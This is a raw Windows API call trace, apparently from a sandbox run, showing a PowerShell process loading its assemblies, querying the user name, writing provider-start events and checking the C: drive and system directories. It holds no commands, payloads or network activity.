	[0168.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.563] GetLastError () returned 0xcb
	[0168.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.563] GetLastError () returned 0xcb
	[0168.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.563] GetLastError () returned 0xcb
	[0168.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0168.563] GetLastError () returned 0xcb
	[0169.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.131] GetLastError () returned 0xcb
	[0169.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.131] GetLastError () returned 0xcb
	[0169.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e148, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.131] GetLastError () returned 0xcb
	[0169.133] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0169.133] GetLastError () returned 0xcb
	[0169.133] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0169.134] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b8a888*="Registry", lpRawData=0x2b8a744) returned 1
	[0169.252] GetLastError () returned 0x0
	[0169.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.254] GetLastError () returned 0x0
	[0169.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.254] GetLastError () returned 0x0
	[0169.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0169.254] GetLastError () returned 0x0
	[0169.263] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0169.264] GetLastError () returned 0x0
	[0169.264] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0169.265] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2b8e670*="Variable", lpRawData=0x2b8e52c) returned 1
	[0169.456] GetLastError () returned 0x0
	[0169.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0169.458] GetLastError () returned 0xcb
	[0169.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0169.461] GetLastError () returned 0xcb
	[0169.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e184, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.472] GetLastError () returned 0xcb
	[0169.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.472] GetLastError () returned 0xcb
	[0169.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.472] GetLastError () returned 0xcb
	[0169.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x10e134, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0169.472] GetLastError () returned 0xcb
	[0170.100] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e784 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e784) returned 0x1
	[0170.256] GetLastError () returned 0x3
	[0170.256] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e78c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e78c) returned 1
	[0170.257] ReportEventW (hEventLog=0x4f60004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a09388*="Certificate", lpRawData=0x2a09244) returned 1
	[0170.478] GetLastError () returned 0x0
	[0170.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.488] GetLastError () returned 0xcb
	[0170.489] GetLogicalDrives () returned 0x4
	[0170.489] GetLastError () returned 0xcb
	[0170.489] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e2fc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.489] GetLastError () returned 0xcb
	[0170.489] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0170.489] GetLastError () returned 0xcb
	[0170.493] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x584bc0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0170.493] GetLastError () returned 0xcb
	[0170.494] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.494] GetLastError () returned 0xcb
	[0170.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.495] GetLastError () returned 0xcb
	[0170.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.512] GetLastError () returned 0xcb
	[0170.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.949] GetLastError () returned 0xcb
	[0170.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e144, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.949] GetLastError () returned 0xcb
	[0170.949] SetErrorMode (uMode=0x1) returned 0x1
	[0170.950] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2a102a8 | out: lpFileInformation=0x2a102a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.950] GetLastError () returned 0xcb
	[0170.950] SetErrorMode (uMode=0x1) returned 0x1
	[0170.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.950] GetLastError () returned 0xcb
	[0170.950] SetErrorMode (uMode=0x1) returned 0x1
	[0170.950] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2a1043c | out: lpFileInformation=0x2a1043c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.950] GetLastError () returned 0xcb
	[0170.950] SetErrorMode (uMode=0x1) returned 0x1
	[0170.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x584bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0170.957] GetLastError () returned 0xcb
	[0170.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.971] GetLastError () returned 0xcb
	[0170.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.971] GetLastError () returned 0xcb
	[0170.971] SetErrorMode (uMode=0x1) returned 0x1
	[0170.971] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10e690 | out: lpFileInformation=0x10e690*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0170.972] GetLastError () returned 0xcb
	[0170.972] SetErrorMode (uMode=0x1) returned 0x1
	[0170.972] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.972] GetLastError () returned 0xcb
	[0170.972] SetErrorMode (uMode=0x1) returned 0x1
	[0170.972] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x10e690 | out: lpFileInformation=0x10e690*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0170.972] GetLastError () returned 0xcb
	[0170.972] SetErrorMode (uMode=0x1) returned 0x1
	[0170.972] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.972] GetLastError () returned 0xcb
	[0170.972] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x10e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0170.972] GetLastError () returned 0xcb
	[0170.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.972] GetLastError () returned 0xcb
	[0170.972] SetErrorMode (uMode=0x1) returned 0x1
	[0170.972] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10e690 | out: lpFileInformation=0x10e690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.972] GetLastError () returned 0xcb
	[0170.972] SetErrorMode (uMode=0x1) returned 0x1
	[0170.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.972] GetLastError () returned 0xcb
	[0170.972] SetErrorMode (uMode=0x1) returned 0x1
	[0170.972] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10e690 | out: lpFileInformation=0x10e690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.973] GetLastError () returned 0xcb
	[0170.973] SetErrorMode (uMode=0x1) returned 0x1
	[0170.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.973] GetLastError () returned 0xcb
	[0170.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x10e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.973] GetLastError () returned 0xcb
	[0170.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.973] GetLastError () returned 0xcb
	[0170.973] SetErrorMode (uMode=0x1) returned 0x1
	[0170.973] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10e690 | out: lpFileInformation=0x10e690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.973] GetLastError () returned 0xcb
	[0170.973] SetErrorMode (uMode=0x1) returned 0x1
	[0170.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.973] GetLastError () returned 0xcb
	[0170.973] SetErrorMode (uMode=0x1) returned 0x1
	[0170.973] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10e690 | out: lpFileInformation=0x10e690*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.973] GetLastError () returned 0xcb
	[0170.973] SetErrorMode (uMode=0x1) returned 0x1
	[0170.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e224, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.973] GetLastError () returned 0xcb
	[0170.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x10e1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.973] GetLastError () returned 0xcb
	[0170.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.974] GetLastError () returned 0xcb
	[0170.974] SetErrorMode (uMode=0x1) returned 0x1
	[0170.974] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10e69c | out: lpFileInformation=0x10e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.974] GetLastError () returned 0xcb
	[0170.974] SetErrorMode (uMode=0x1) returned 0x1
	[0170.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.974] GetLastError () returned 0xcb
	[0170.974] SetErrorMode (uMode=0x1) returned 0x1
	[0170.974] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x10e69c | out: lpFileInformation=0x10e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0170.974] GetLastError () returned 0xcb
	[0170.974] SetErrorMode (uMode=0x1) returned 0x1
	[0170.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.974] GetLastError () returned 0xcb
	[0170.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x10e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0170.974] GetLastError () returned 0xcb
	[0170.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.974] GetLastError () returned 0xcb
	[0170.974] SetErrorMode (uMode=0x1) returned 0x1
	[0170.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10e69c | out: lpFileInformation=0x10e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.974] GetLastError () returned 0xcb
	[0170.974] SetErrorMode (uMode=0x1) returned 0x1
	[0170.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.975] GetLastError () returned 0xcb
	[0170.975] SetErrorMode (uMode=0x1) returned 0x1
	[0170.975] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x10e69c | out: lpFileInformation=0x10e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.975] GetLastError () returned 0xcb
	[0170.975] SetErrorMode (uMode=0x1) returned 0x1
	[0170.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.975] GetLastError () returned 0xcb
	[0170.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x10e1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.975] GetLastError () returned 0xcb
	[0170.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x10e2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0170.984] GetLastError () returned 0xcb
	[0170.984] SetErrorMode (uMode=0x1) returned 0x1
	[0170.984] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2a181e4 | out: lpFileInformation=0x2a181e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0170.984] GetLastError () returned 0xcb
	[0170.984] SetErrorMode (uMode=0x1) returned 0x1
	[0170.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e334, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.986] GetLastError () returned 0xcb
	[0170.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.986] GetLastError () returned 0xcb
	[0170.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.986] GetLastError () returned 0xcb
	[0170.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0170.986] GetLastError () returned 0xcb
	[0171.145] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x5f1fc0, nSize=0x10e888 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10e888) returned 0x1
	[0171.146] GetLastError () returned 0xcb
	[0171.146] GetUserNameW (in: lpBuffer=0x584bc0, pcbBuffer=0x10e890 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10e890) returned 1
